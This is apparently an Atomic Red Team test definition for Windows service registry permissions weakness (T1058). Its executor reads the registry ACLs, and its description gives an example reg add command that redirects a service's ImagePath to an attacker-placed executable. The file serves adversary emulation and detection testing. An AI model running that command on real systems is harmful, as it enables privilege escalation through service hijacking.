---
attack_technique: T1058
display_name: Service Registry Permissions Weakness

atomic_tests:
- name: Service Registry Permissions Weakness
  auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
  description: |
    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"

  supported_platforms:
    - windows

  input_arguments:
    weak_service_name:
      description: weak service check
      type: String
      default: weakservicename

  executor:
    name: powershell
    elevation_required: false
    command: |
      get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
      get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL

